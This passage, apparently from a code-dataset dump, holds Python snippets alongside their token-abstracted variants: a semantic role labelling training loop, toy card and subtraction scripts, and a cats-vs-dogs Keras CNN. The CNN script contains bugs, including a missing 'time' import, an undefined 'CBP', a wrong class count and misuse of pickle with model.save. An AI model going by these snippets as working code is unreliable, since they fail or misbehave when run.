FScore()\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)\n print('-' * 10, file=sys.stderr)\n for phase in ['train', 'dev']:\n model.train(phase == 'train')\n running_loss = 0.0\n running_f = FScore()\n for sentence in pb.progressbar(trainset.get_set(phase)):\n model.zero_grad()\n role_p = model(*sentence['inputs'])\n _, predict = torch.max(role_p, 1)\n loss = lossfunction(role_p, autograd.Variable(sentence[\n 'targets'][0]))\n if phase == 'train':\n loss.backward()\n optimizer.step()\n if epoch > 28:\n print(predict.data)\n print(sentence['targets'][0])\n running_loss += loss.data[0]\n running_f.update(predict, sentence['targets'][0])\n print('\\n{} Loss: {:.4f} {}'.format(phase, running_loss,\n running_f), file=sys.stderr)\n if phase == 'dev' and running_f > best_f:\n best_f = running_f\n best_model_wts = copy.deepcopy(model.state_dict())\n print('', file=sys.stderr)\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,\n time_elapsed % 60), file=sys.stderr)\n print('Best val F: {}s'.format(best_f), file=sys.stderr)\n model.load_state_dict(best_model_wts)\n return model\n\n\nif __name__ == '__main__':\n config.parse_args()\n torch.manual_seed(config.get_option('seed'))\n mode = config.get_option('mode')\n if mode == 'train':\n train()\n else:\n NotImplementedError()\n", "<import token>\n<code token>\n\n\ndef train(num_epochs=30):\n lossfunction = nn.CrossEntropyLoss()\n trainset = TrainDataSet()\n model = BiAffineSrlModel(vocabs=trainset.vocabs)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_f = FScore()\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)\n print('-' * 10, file=sys.stderr)\n for phase in ['train', 'dev']:\n model.train(phase == 'train')\n running_loss = 0.0\n running_f = FScore()\n for sentence in pb.progressbar(trainset.get_set(phase)):\n model.zero_grad()\n role_p = model(*sentence['inputs'])\n _, predict = torch.max(role_p, 1)\n loss = lossfunction(role_p, autograd.Variable(sentence[\n 'targets'][0]))\n if phase == 'train':\n loss.backward()\n optimizer.step()\n if epoch > 28:\n print(predict.data)\n print(sentence['targets'][0])\n running_loss += loss.data[0]\n running_f.update(predict, sentence['targets'][0])\n print('\\n{} Loss: {:.4f} {}'.format(phase, running_loss,\n running_f), file=sys.stderr)\n if phase == 'dev' and running_f > best_f:\n best_f = running_f\n best_model_wts = copy.deepcopy(model.state_dict())\n print('', file=sys.stderr)\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,\n time_elapsed % 60), file=sys.stderr)\n print('Best val F: {}s'.format(best_f), file=sys.stderr)\n model.load_state_dict(best_model_wts)\n return model\n\n\n<code token>\n", "<import token>\n<code token>\n<function token>\n<code token>\n" ]
false
19
b5180a2dbe1f12e1bbc92874c67ea99c9a84a9ed
# print all cards with even numbers. cards = ["2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "A"] for card in cards: try: number = int(card) if number % 2 == 0: # modulo operator print(card, "is an even card.") except ValueError: print (card, "can not be divided")
[ "\n# print all cards with even numbers.\n\ncards = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"J\", \"Q\", \"K\", \"A\"]\n\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0: # modulo operator\n print(card, \"is an even card.\")\n except ValueError:\n print (card, \"can not be divided\")\n", "cards = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0:\n print(card, 'is an even card.')\n except ValueError:\n print(card, 'can not be divided')\n", "<assignment token>\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0:\n print(card, 'is an even card.')\n except ValueError:\n print(card, 'can not be divided')\n", "<assignment token>\n<code token>\n" ]
false
20
a045423edd94d985dfc9660bcfe4a88c61bf4574
#Script start print"This is the two number subtraction python program." a = 9 b = 2 c = a - b print c # Scrip close
[ "#Script start\nprint\"This is the two number subtraction python program.\"\na = 9\nb = 2\nc = a - b\nprint c\n\n# Scrip close\n" ]
true
21
13c9f0f58ec6da317c3802f594bb0db7c275dee9
''' !pip install wget from zipfile import ZipFile import wget print('Beginning file downlaod with wget module') url = 'https://download.microsoft.com/download/3/E/1/3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_3367a.zip' wget.download(url, 'sample_data/') print('2. Extract all files in ZIP to different directory') # Create a ZipFile Object and load sample.zip in it with ZipFile('sample_data/kagglecatsanddogs_3367a.zip', 'r') as zipObj: # Extract all the contents of zip file in different directory zipObj.extractall('content/') ''' import numpy as np import matplotlib.pyplot as plt import os import cv2 import pickle import random import datetime import tensorflow as tf from tensorflow.python.keras.datasets import cifar10 from tensorflow.python.keras.preprocessing.image import ImageDataGenerator from tensorflow.python.keras.models import Sequential from tensorflow.python.keras.layers import Activation, Dense, Flatten, Dropout from tensorflow.python.keras.layers import Conv2D, MaxPooling2D from tensorflow.python.keras.optimizers import Adam from tensorflow.python.keras.callbacks import TensorBoard DATADIR = 'content/PetImages' CATEGORIES = ['Cat', 'Dog'] #'''categories that we have to deal with''' img_array= [] for category in CATEGORIES: path = os.path.join(DATADIR, category) # path to cats and dogs dir for img in os.listdir(path): img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR) plt.imshow(img_array, cmap='gray') plt.show() print(img_array) print(img_array.shape) break break IMG_SIZE = 299 #every image of 299x299 resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) plt.imshow(resized_img_array, cmap='gray') # cmap = hot, plasma, cool, plt.show() training_data = [] def create_training_data(): # creating training datasets for category in CATEGORIES: path = os.path.join(DATADIR, category) # path to cats and dogs dir classIndex = CATEGORIES.index(category) # 0 for dog and 1 for cat for img in os.listdir(path): try: img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR) resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) training_data.append([resized_img_array, classIndex]) except Exception as e: pass create_training_data() print(len(training_data)) '''shuffle training data''' random.shuffle(training_data) # for sample in training_data[:10]: # print(sample[1]) x=[] y=[] for features, label in training_data: x.append(features) y.append(label) x = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3) #we can't pass a list to keras for training #'''we have to pass here a numpy array ''' # print(x[0].reshape(-1, IMG_SIZE, IMG_SIZE, 1)) pickle_out = open("x.pickle", 'wb') pickle.dump(x, pickle_out) pickle_out.close() pickle_out= open('y.pickle', 'wb') pickle.dump(y, pickle_out) pickle_out.close() pickle_in = open('x.pickle', 'rb') x = pickle.load(pickle_in) pickle_in = open('y.pickle', 'rb') y = pickle.load(pickle_in) x = x / 255.0 INPUT_SHAPE = x.shape[1:]#(224, 224, 3) DROPOUT=0.2 NB_CLASSES=10 NB_EPOCHS=10 BATCH_SIZE=128 VALIDATION_SPLIT=0.2 OPTIMIZER = Adam() max, min, accIndex , lossIndex=70.0 , 4.0, 1, 1 date = datetime.datetime.now() dense_layers = [2, 1, 0] # 0, 1,2 layer_sizes = [512, 256, 128, 64] #32, 64, 128, 256, 512 conv_layers = [3, 2, 1] # 1, 2,3 for dense_layer in dense_layers: for layer_size in layer_sizes: for conv_layer in conv_layers: NAME = "{}-conv-{}-nodes-{}-dense-{}".format(conv_layer, layer_size, dense_layer, int(time.time())) print(NAME) model = Sequential() model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE)) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2))) for l in range(conv_layer-1): model.add(Conv2D(layer_size, (5, 5))) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2))) model.add(Dropout(DROPOUT)) model.add(Flatten()) for _ in range(dense_layer): model.add(Dense(layer_size)) model.add(Activation('relu')) model.add(Dropout(DROPOUT)) model.add(Dense(NB_CLASSES)) model.add(Activation('softmax')) tensorboard = TensorBoard(log_dir="logs/{}".format(NAME)) model.compile(loss='categorical_crossentropy', optimizer=OPTIMIZER, metrics=['accuracy'], ) history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1, callbacks=[tensorboard]) if history.history.get('val_acc')[-1] > max: max = history.history.get('val_acc')[-1] if accIndex >= 2: os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex-1, round(max, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")) val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex, round(max, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}"), "wb") pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex, round(max, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")), val_acc_out) val_acc_out.close() accIndex += 1 pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb') p_upload = pickle.load(pickle_upload) print(p_upload) if history.history.get('val_loss')[-1] < min: min = history.history.get('val_loss')[-1] if lossIndex>=2: os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex-1, round(min, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")) val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(min, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")) pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(min, 4), CBP[0], CBP[1], CBP[2], f":{date:%Y-%m-%d-%Hh%Mm%Ss}")), val_loss_out) val_loss_out.close() lossIndex += 1 model.save('64x3-CNN.model') CATEGORIES = ["Dog", "Cat"] # will use this to convert prediction num to string value def prepare(filepath): IMG_SIZE = 299 # 50 in txt-based img_array = cv2.imread(filepath, cv2.IMREAD_COLOR) # read in the image, convert to grayscale resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) # resize image to match model's expected sizing return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3) # return the image with shaping that TF wants. model = tf.keras.models.load_model("64x3-CNN.model") prediction = model.predict([prepare('dog.jpg')]) # REMEMBER YOU'RE PASSING A LIST OF THINGS YOU WISH TO PREDICT print(prediction) print(prediction[0][0]) print(CATEGORIES[int(prediction[0][0])]) #We can also test our cat example: prediction = model.predict([prepare('cat.jpg')]) print(prediction) # will be a list in a list. print(CATEGORIES[int(prediction[0][0])]) ''' alpha. Also referred to as the learning rate or step size. The proportion that weights are updated (e.g. 0.001). Larger values (e.g. 0.3) results in faster initial learning before the rate is updated. Smaller values (e.g. 1.0E-5) slow learning right down during training beta1. The exponential decay rate for the first moment estimates (e.g. 0.9). beta2. The exponential decay rate for the second-moment estimates (e.g. 0.999). This value should be set close to 1.0 on problems with a sparse gradient (e.g. NLP and computer vision problems). epsilon. Is a very small number to prevent any division by zero in the implementation (e.g. 10E-8). We can see that the popular deep learning libraries generally use the default parameters recommended by the paper. TensorFlow: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08. Keras: lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0. Blocks: learning_rate=0.002, beta1=0.9, beta2=0.999, epsilon=1e-08, decay_factor=1. Lasagne: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08 Caffe: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08 MxNet: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8 Torch: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8 '''
[ "'''\n!pip install wget\nfrom zipfile import ZipFile\nimport wget\nprint('Beginning file downlaod with wget module')\n\nurl = 'https://download.microsoft.com/download/3/E/1/3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_3367a.zip'\nwget.download(url, 'sample_data/')\n\n\nprint('2. Extract all files in ZIP to different directory')\n\n # Create a ZipFile Object and load sample.zip in it\nwith ZipFile('sample_data/kagglecatsanddogs_3367a.zip', 'r') as zipObj:\n # Extract all the contents of zip file in different directory\n zipObj.extractall('content/')\n\n'''\n\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\nimport pickle\nimport random\nimport datetime\nimport tensorflow as tf\nfrom tensorflow.python.keras.datasets import cifar10\nfrom tensorflow.python.keras.preprocessing.image import ImageDataGenerator\n\n\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.layers import Activation, Dense, Flatten, Dropout\nfrom tensorflow.python.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.python.keras.optimizers import Adam\n\nfrom tensorflow.python.keras.callbacks import TensorBoard\n\n\nDATADIR = 'content/PetImages'\nCATEGORIES = ['Cat', 'Dog'] #'''categories that we have to deal with'''\nimg_array= []\n\nfor category in CATEGORIES:\n path = os.path.join(DATADIR, category) # path to cats and dogs dir\n for img in os.listdir(path):\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)\n plt.imshow(img_array, cmap='gray')\n plt.show()\n\n print(img_array)\n print(img_array.shape)\n\n break\n break\n\n\nIMG_SIZE = 299 #every image of 299x299\nresized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\nplt.imshow(resized_img_array, cmap='gray') # cmap = hot, plasma, cool,\nplt.show()\n\n\ntraining_data = []\ndef create_training_data(): # creating training datasets\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category) # path to cats and dogs dir\n\n classIndex = CATEGORIES.index(category) # 0 for dog and 1 for cat\n\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)\n\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\ncreate_training_data()\n\nprint(len(training_data))\n\n\n\n'''shuffle training data'''\nrandom.shuffle(training_data)\n\n\n\n# for sample in training_data[:10]:\n# print(sample[1])\n\n\n\nx=[]\ny=[]\nfor features, label in training_data:\n x.append(features)\n y.append(label)\nx = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3) #we can't pass a list to keras for training\n #'''we have to pass here a numpy array '''\n\n# print(x[0].reshape(-1, IMG_SIZE, IMG_SIZE, 1))\n\n\npickle_out = open(\"x.pickle\", 'wb')\npickle.dump(x, pickle_out)\npickle_out.close()\n\npickle_out= open('y.pickle', 'wb')\npickle.dump(y, pickle_out)\npickle_out.close()\n\npickle_in = open('x.pickle', 'rb')\nx = pickle.load(pickle_in)\npickle_in = open('y.pickle', 'rb')\ny = pickle.load(pickle_in)\n\n\nx = x / 255.0\nINPUT_SHAPE = x.shape[1:]#(224, 224, 3)\nDROPOUT=0.2\nNB_CLASSES=10\nNB_EPOCHS=10\nBATCH_SIZE=128\nVALIDATION_SPLIT=0.2\nOPTIMIZER = Adam()\n\n\nmax, min, accIndex , lossIndex=70.0 , 4.0, 1, 1\ndate = datetime.datetime.now()\n\ndense_layers = [2, 1, 0] # 0, 1,2\nlayer_sizes = [512, 256, 128, 64] #32, 64, 128, 256, 512\nconv_layers = [3, 2, 1] # 1, 2,3\n\nfor dense_layer in dense_layers:\n for layer_size in layer_sizes:\n for conv_layer in conv_layers:\n NAME = \"{}-conv-{}-nodes-{}-dense-{}\".format(conv_layer, layer_size, dense_layer, int(time.time()))\n print(NAME)\n\n model = Sequential()\n\n model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n for l in range(conv_layer-1):\n model.add(Conv2D(layer_size, (5, 5)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(DROPOUT))\n\n model.add(Flatten())\n\n for _ in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n model.add(Dropout(DROPOUT))\n\n model.add(Dense(NB_CLASSES))\n model.add(Activation('softmax'))\n\n tensorboard = TensorBoard(log_dir=\"logs/{}\".format(NAME))\n\n model.compile(loss='categorical_crossentropy',\n optimizer=OPTIMIZER,\n metrics=['accuracy'],\n )\n\n history = model.fit(x, y,\n batch_size=BATCH_SIZE,\n epochs=NB_EPOCHS,\n validation_split=VALIDATION_SPLIT,\n verbose=1,\n callbacks=[tensorboard])\n if history.history.get('val_acc')[-1] > max:\n max = history.history.get('val_acc')[-1]\n if accIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex-1, round(max, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\"))\n val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex, round(max, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\"), \"wb\")\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex, round(max, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\")),\n val_acc_out)\n val_acc_out.close()\n accIndex += 1\n\n pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')\n p_upload = pickle.load(pickle_upload)\n print(p_upload)\n\n\n if history.history.get('val_loss')[-1] < min:\n min = history.history.get('val_loss')[-1]\n if lossIndex>=2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex-1, round(min, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\"))\n val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(min, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\"))\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex, round(min, 4), CBP[0], CBP[1], CBP[2], f\":{date:%Y-%m-%d-%Hh%Mm%Ss}\")),\n val_loss_out)\n val_loss_out.close()\n lossIndex += 1\n\n\n\n\nmodel.save('64x3-CNN.model')\n\n\nCATEGORIES = [\"Dog\", \"Cat\"] # will use this to convert prediction num to string value\n\n\ndef prepare(filepath):\n IMG_SIZE = 299 # 50 in txt-based\n img_array = cv2.imread(filepath, cv2.IMREAD_COLOR) # read in the image, convert to grayscale\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) # resize image to match model's expected sizing\n return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3) # return the image with shaping that TF wants.\n\n\nmodel = tf.keras.models.load_model(\"64x3-CNN.model\")\nprediction = model.predict([prepare('dog.jpg')]) # REMEMBER YOU'RE PASSING A LIST OF THINGS YOU WISH TO PREDICT\nprint(prediction)\nprint(prediction[0][0])\n\nprint(CATEGORIES[int(prediction[0][0])])\n\n\n#We can also test our cat example:\n\nprediction = model.predict([prepare('cat.jpg')])\nprint(prediction) # will be a list in a list.\nprint(CATEGORIES[int(prediction[0][0])])\n\n\n\n'''\nalpha. Also referred to as the learning rate or step size. The proportion that weights are updated (e.g. 0.001). Larger values (e.g. 0.3) results in faster initial learning before the rate is updated. Smaller values (e.g. 1.0E-5) slow learning right down during training\nbeta1. The exponential decay rate for the first moment estimates (e.g. 0.9).\nbeta2. The exponential decay rate for the second-moment estimates (e.g. 0.999). This value should be set close to 1.0 on problems with a sparse gradient (e.g. NLP and computer vision problems).\nepsilon. Is a very small number to prevent any division by zero in the implementation (e.g. 10E-8).\n\nWe can see that the popular deep learning libraries generally use the default parameters recommended by the paper.\n\nTensorFlow: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08.\nKeras: lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0.\nBlocks: learning_rate=0.002, beta1=0.9, beta2=0.999, epsilon=1e-08, decay_factor=1.\nLasagne: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08\nCaffe: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-08\nMxNet: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8\nTorch: learning_rate=0.001, beta1=0.9, beta2=0.999, epsilon=1e-8\n\n\n\n\n'''", "<docstring token>\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\nimport pickle\nimport random\nimport datetime\nimport tensorflow as tf\nfrom tensorflow.python.keras.datasets import cifar10\nfrom tensorflow.python.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.layers import Activation, Dense, Flatten, Dropout\nfrom tensorflow.python.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.python.keras.optimizers import Adam\nfrom tensorflow.python.keras.callbacks import TensorBoard\nDATADIR = 'content/PetImages'\nCATEGORIES = ['Cat', 'Dog']\nimg_array = []\nfor category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n for img in os.listdir(path):\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)\n plt.imshow(img_array, cmap='gray')\n plt.show()\n print(img_array)\n print(img_array.shape)\n break\n break\nIMG_SIZE = 299\nresized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\nplt.imshow(resized_img_array, cmap='gray')\nplt.show()\ntraining_data = []\n\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n classIndex = CATEGORIES.index(category)\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.\n IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\n\ncreate_training_data()\nprint(len(training_data))\n<docstring token>\nrandom.shuffle(training_data)\nx = []\ny = []\nfor features, label in training_data:\n x.append(features)\n y.append(label)\nx = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3)\npickle_out = open('x.pickle', 'wb')\npickle.dump(x, pickle_out)\npickle_out.close()\npickle_out = open('y.pickle', 'wb')\npickle.dump(y, pickle_out)\npickle_out.close()\npickle_in = open('x.pickle', 'rb')\nx = pickle.load(pickle_in)\npickle_in = open('y.pickle', 'rb')\ny = pickle.load(pickle_in)\nx = x / 255.0\nINPUT_SHAPE = x.shape[1:]\nDROPOUT = 0.2\nNB_CLASSES = 10\nNB_EPOCHS = 10\nBATCH_SIZE = 128\nVALIDATION_SPLIT = 0.2\nOPTIMIZER = Adam()\nmax, min, accIndex, lossIndex = 70.0, 4.0, 1, 1\ndate = datetime.datetime.now()\ndense_layers = [2, 1, 0]\nlayer_sizes = [512, 256, 128, 64]\nconv_layers = [3, 2, 1]\nfor dense_layer in dense_layers:\n for layer_size in layer_sizes:\n for conv_layer in conv_layers:\n NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,\n layer_size, dense_layer, int(time.time()))\n print(NAME)\n model = Sequential()\n model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n for l in range(conv_layer - 1):\n model.add(Conv2D(layer_size, (5, 5)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(DROPOUT))\n model.add(Flatten())\n for _ in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n model.add(Dropout(DROPOUT))\n model.add(Dense(NB_CLASSES))\n model.add(Activation('softmax'))\n tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))\n model.compile(loss='categorical_crossentropy', optimizer=\n OPTIMIZER, metrics=['accuracy'])\n history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=\n NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,\n callbacks=[tensorboard])\n if history.history.get('val_acc')[-1] > max:\n max = history.history.get('val_acc')[-1]\n if accIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'), 'wb')\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_acc_out)\n val_acc_out.close()\n accIndex += 1\n pickle_upload = open('{}_pickle'.format(accIndex - 1), 'rb')\n p_upload = pickle.load(pickle_upload)\n print(p_upload)\n if history.history.get('val_loss')[-1] < min:\n min = history.history.get('val_loss')[-1]\n if lossIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(lossIndex - 1,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_loss_out = open('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n pickle.dump(model.save('{}_{}_{}_{}_{}_{}'.format(lossIndex,\n round(min, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}')), val_loss_out)\n val_loss_out.close()\n lossIndex += 1\nmodel.save('64x3-CNN.model')\nCATEGORIES = ['Dog', 'Cat']\n\n\ndef prepare(filepath):\n IMG_SIZE = 299\n img_array = cv2.imread(filepath, cv2.IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n return resized_img_array.reshape(-1, IMG_SIZE, IMG_SIZE, 3)\n\n\nmodel = tf.keras.models.load_model('64x3-CNN.model')\nprediction = model.predict([prepare('dog.jpg')])\nprint(prediction)\nprint(prediction[0][0])\nprint(CATEGORIES[int(prediction[0][0])])\nprediction = model.predict([prepare('cat.jpg')])\nprint(prediction)\nprint(CATEGORIES[int(prediction[0][0])])\n<docstring token>\n", "<docstring token>\n<import token>\nDATADIR = 'content/PetImages'\nCATEGORIES = ['Cat', 'Dog']\nimg_array = []\nfor category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n for img in os.listdir(path):\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)\n plt.imshow(img_array, cmap='gray')\n plt.show()\n print(img_array)\n print(img_array.shape)\n break\n break\nIMG_SIZE = 299\nresized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\nplt.imshow(resized_img_array, cmap='gray')\nplt.show()\ntraining_data = []\n\n\ndef create_training_data():\n for category in CATEGORIES:\n path = os.path.join(DATADIR, category)\n classIndex = CATEGORIES.index(category)\n for img in os.listdir(path):\n try:\n img_array = cv2.imread(os.path.join(path, img), cv2.\n IMREAD_COLOR)\n resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n training_data.append([resized_img_array, classIndex])\n except Exception as e:\n pass\n\n\ncreate_training_data()\nprint(len(training_data))\n<docstring token>\nrandom.shuffle(training_data)\nx = []\ny = []\nfor features, label in training_data:\n x.append(features)\n y.append(label)\nx = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 3)\npickle_out = open('x.pickle', 'wb')\npickle.dump(x, pickle_out)\npickle_out.close()\npickle_out = open('y.pickle', 'wb')\npickle.dump(y, pickle_out)\npickle_out.close()\npickle_in = open('x.pickle', 'rb')\nx = pickle.load(pickle_in)\npickle_in = open('y.pickle', 'rb')\ny = pickle.load(pickle_in)\nx = x / 255.0\nINPUT_SHAPE = x.shape[1:]\nDROPOUT = 0.2\nNB_CLASSES = 10\nNB_EPOCHS = 10\nBATCH_SIZE = 128\nVALIDATION_SPLIT = 0.2\nOPTIMIZER = Adam()\nmax, min, accIndex, lossIndex = 70.0, 4.0, 1, 1\ndate = datetime.datetime.now()\ndense_layers = [2, 1, 0]\nlayer_sizes = [512, 256, 128, 64]\nconv_layers = [3, 2, 1]\nfor dense_layer in dense_layers:\n for layer_size in layer_sizes:\n for conv_layer in conv_layers:\n NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,\n layer_size, dense_layer, int(time.time()))\n print(NAME)\n model = Sequential()\n model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n for l in range(conv_layer - 1):\n model.add(Conv2D(layer_size, (5, 5)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(DROPOUT))\n model.add(Flatten())\n for _ in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n model.add(Dropout(DROPOUT))\n model.add(Dense(NB_CLASSES))\n model.add(Activation('softmax'))\n tensorboard = TensorBoard(log_dir='logs/{}'.format(NAME))\n model.compile(loss='categorical_crossentropy', optimizer=\n OPTIMIZER, metrics=['accuracy'])\n history = model.fit(x, y, batch_size=BATCH_SIZE, epochs=\n NB_EPOCHS, validation_split=VALIDATION_SPLIT, verbose=1,\n callbacks=[tensorboard])\n if history.history.get('val_acc')[-1] > max:\n max = history.history.get('val_acc')[-1]\n if accIndex >= 2:\n os.remove('{}_{}_{}_{}_{}_{}'.format(accIndex - 1,\n round(max, 4), CBP[0], CBP[1], CBP[2],\n f':{date:%Y-%m-%d-%Hh%Mm%Ss}'))\n val_acc_out = open('{}_{}_{}_{}_{}_{}'.format(accIndex,\n round(max, 4), CBP[0], 